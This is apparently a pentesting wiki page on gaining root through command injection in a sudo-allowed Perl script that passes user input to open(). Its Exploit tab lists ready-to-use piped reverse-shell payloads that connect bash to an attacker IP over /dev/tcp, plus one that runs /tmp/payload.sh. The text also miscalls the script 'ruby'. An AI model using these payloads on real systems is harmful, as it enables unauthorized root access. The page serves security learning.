# Perl

## Theory

Perl scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, perl scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access.

## Practice

### Open() Command Injection

{% tabs %}
{% tab title="Enumerate" %}
Assume the ruby script can be executed as root with sudo rights. If it use the `open()` method and we controll its input, then the script is vulnerable to arbitrary code execution.

```bash
sudo -l
    (root): /usr/bin/perl open.pl
```

Check if we have control over the input of the vulnerable function

```perl
my $file = <>;
open(FH, $file);
while (my $line = <FH>) {
  print($line);
}
```

{% endtab %}

{% tab title="Exploit" %}
If we controll some variables passed to this vulnerables functions, we can inject arbitrary code. here is an example of a malicious payloads passed to the `open()` function:

```bash
$ sudo /usr/bin/perl open.pl

|bash -c 'bash -i >& /dev/tcp/<ATTACKING_IP>/9001 0>&1'
bash -c 'bash -i >& /dev/tcp/10.10.14.12/9001 0>&1'|
|/tmp/payload.sh
```

{% hint style="info" %}
The `|` is a built in functionality used to execute the file when opening it. The file must be executable.
{% endhint %}
{% endtab %}
{% endtabs %}

## References

{% embed url="<https://ippsec.rocks>" %}